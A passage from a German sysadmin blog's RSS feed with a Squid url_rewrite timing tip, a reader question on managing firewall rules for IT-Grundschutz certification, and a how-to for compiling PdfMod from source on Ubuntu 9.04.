<p>[code language="shell"]time tail /var/log/squid/access_combined.log -n 100000 | awk '{print $7}' | /pfad/zum/url_rewriter.pl &gt; /dev/null[/code]</p>
<p>Wenn dort (z.B. bei einem komplizierterem Script) Werte von mehr als 5 Sekunden stehen, sollte man sein Script für hohe Bandbreiten ggfs. überarbeiten und/oder in einer performanteren Sprache reimplementieren,  z.B. in C oder für Extremfälle in Assembler. <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <em><br />
</em><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/FH2Vh2FQFB8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/tests/squid-url_rewrite-performance/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/tests/squid-url_rewrite-performance/</feedburner:origLink></item>
		<item>
		<title>Firewallregelmanagement</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/IYk_q4h1vwA/</link>
		<comments>http://www.adminlife.net/adminlife/firewallregelmanagement/#comments</comments>
		<pubDate>Sun, 20 Sep 2009 16:04:29 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[bsi]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[Firewallregeln]]></category>
		<category><![CDATA[Repo]]></category>
		<category><![CDATA[Sicherung]]></category>
		<category><![CDATA[SVN]]></category>
		<category><![CDATA[zertifizierung]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1726</guid>
		<description><![CDATA[Ich frage mich, wie ihr eure Firewallregeln in Firmenfirewalls verwaltet und sichert &#8211; wer iptables oder eine darauf basierende Lösung besitzt, wird wohl einfach automatisch oder eventbasiert Backups machen oder die Regeln in ein Repo einchecken &#8211; doch was machen die armen Admins, die mit proprietärer Hardware zu tun haben? Mir fallen spontan folgende 5 [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Ich frage mich, wie ihr eure Firewallregeln in Firmenfirewalls verwaltet und sichert &#8211; wer iptables oder eine darauf basierende Lösung besitzt, wird wohl einfach automatisch oder eventbasiert Backups machen oder die Regeln in ein Repo einchecken &#8211; doch was machen die armen Admins, die mit proprietärer Hardware zu tun haben? Mir fallen spontan folgende 5 Punkte ein:</p>
<ul>
<li>Programmieren einer Schnittstelle, die die Regeln ausliest und in ein Repo eincheckt</li>
<li>Automatische Backups durch die Firewall erzeugen lassen (oftmals per Mail möglich) und einchecken in ein Repo</li>
<li>Eingeben der Firewallregeln in ein Dokumentationssystem</li>
<li>Eingeben der Firewallregeln in ein System, welches die Regeln dann auf der Firewall anlegt</li>
<li>Keine Dokumentation <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
</ul>
<p>Mich würde interessieren, wie ihr hier vorgeht? Z.B. für eine Zertifizierung nach dem <a href="http://de.wikipedia.org/wiki/IT-Grundschutzhandbuch">IT-Grundschutzhandbuch</a> sind solche organisatorischen Dinge nicht ganz unwichtig.<!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/IYk_q4h1vwA" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/adminlife/firewallregelmanagement/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/adminlife/firewallregelmanagement/</feedburner:origLink></item>
		<item>
		<title>PdfMod Installation unter Ubuntu 9.04</title>
		<link>http://feedproxy.google.com/~r/adminlife/~3/oLSDAt7Ck-M/</link>
		<comments>http://www.adminlife.net/howtos/pdfmod-installation-unter-ubuntu-9-04/#comments</comments>
		<pubDate>Sun, 06 Sep 2009 07:51:38 +0000</pubDate>
		<dc:creator>matthias</dc:creator>
				<category><![CDATA[howtos]]></category>
		<category><![CDATA[deb]]></category>
		<category><![CDATA[hyena]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[installation]]></category>
		<category><![CDATA[installieren]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[make]]></category>
		<category><![CDATA[package]]></category>
		<category><![CDATA[paket]]></category>
		<category><![CDATA[paketquelle]]></category>
		<category><![CDATA[pdfmod]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1718</guid>
		<description><![CDATA[Bei PdfMod handelt es sich um eine einfache Applikation zum Bearbeiten von PDF Dateien. Mit der Gnome Applikation können beispielsweise einzelne PDF Seiten exportiert, entfernt oder rotiert werden. Weitere Funktionen finden sich auf der offiziellen Homepage. Da es derzeit kein offizielles Ubuntu Paket für Ubuntu Jaunty gibt, müssen wir PdfMod aus den Quellen kompilieren. Zuerst [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="size-full wp-image-1719 aligncenter" title="pdfmod" src="http://www.adminlife.net/wp-content/uploads/2009/09/pdfmod2.png" alt="pdfmod" width="500" height="375" /></p>
<p align="justify">Bei <a href="http://live.gnome.org/PdfMod">PdfMod</a> handelt es sich um eine einfache Applikation zum Bearbeiten von PDF Dateien. Mit der Gnome Applikation können beispielsweise einzelne PDF Seiten exportiert, entfernt oder rotiert werden. Weitere Funktionen finden sich auf der <a href="http://live.gnome.org/PdfMod">offiziellen Homepage</a>.</p>
<p align="justify">Da es derzeit kein offizielles Ubuntu Paket für Ubuntu Jaunty gibt, müssen wir PdfMod aus den Quellen kompilieren. Zuerst benötigen wir einige Abhängigkeiten und  bereiten das System vor:</p>
<p>[code language="css"]<br />
sudo aptitude install build-essential intltool mono-gmcs<br />
sudo ln -s /usr/bin/gmcs2 /usr/bin/gmcs<br />
[/code]</p>
<p align="justify">PdfMod hat als Abhängigkeit die C# Library <a href="http://live.gnome.org/Hyena">Hyena</a>, die wie folgt heruntergeladen und nach <code>/usr/local</code> installiert werden kann:</p>
<p>[code language="css"]<br />
wget http://ftp.gnome.org/pub/GNOME/sources/hyena/0.1/hyena-0.1.tar.gz<br />
tar xzvf hyena-0.1.tar.gz<br />
cd hyena-0.1/<br />
./configure --prefix=/usr/local<br />
make &amp;&amp; sudo make install<br />
[/code]</p>
<p align="justify">PdfMod wird ebenfalls heruntergeladen und konfiguriert:</p>
<p>[code language="css"]<br />
wget http://ftp.gnome.org/pub/GNOME/sources/pdfmod/0.6/pdfmod-0.6.tar.gz<br />
tar xzvf pdfmod-0.6.tar.gz<br />
cd pdfmod-0.6/<br />
./configure --prefix=/usr/local<br />
[/code]</p>
<p align="justify">Leider gibt es bei der aktuellen Version noch einen Bug, der folgenden Fehler beim <code>make</code> Aufruf erzeugt:</p>
<p>[code language="css"]<br />
cp: cannot stat `@expanded_libdir@/hyena/Hyena.dll': No such file or directory<br />
cp: cannot stat `@expanded_libdir@/hyena/Hyena.Gui.dll': No such file or directory<br />
[/code]</p>
<p align="justify">Hierbei hilf folgender <code>sed</code> Aufruf, der die fehlerhaften Zeilen ersetzt:</p>
<p>[code language="css"]<br />
sed -i 's/@expanded_libdir@/${expanded_libdir}/g' config.status<br />
[/code]</p>
<p align="justify">Danach wird PdfMod wie folgt kompiliert und installiert:</p>
<p>[code language="css"]<br />
make &amp;&amp; sudo make install<br />
[/code]</p>
<p align="justify">Nun ist PdfMod installiert und kann mittels <code>pdfmod</code> aufgerufen werden. Ubuntu 9.10/Karmic Benutzer können sich die Kompilierorgie übrigens sparen &#8211; es gibt <a href="https://launchpad.net/~pdfmod-team/+archive/ppa">fertige Pakete im PPA</a>.</p>
<p><!-- PHP 5.x --></p>
<img src="http://feeds.feedburner.com/~r/adminlife/~4/oLSDAt7Ck-M" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/howtos/pdfmod-installation-unter-ubuntu-9-04/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.adminlife.net/howtos/pdfmod-installation-unter-ubuntu-9-04/</feedburner:origLink></item>
	</channel>
</rss><!-- Dynamic page generated in 2.091 seconds. --><!-- Cached page generated by WP-Super-Cache on 2012-05-30 21:06:33 -->

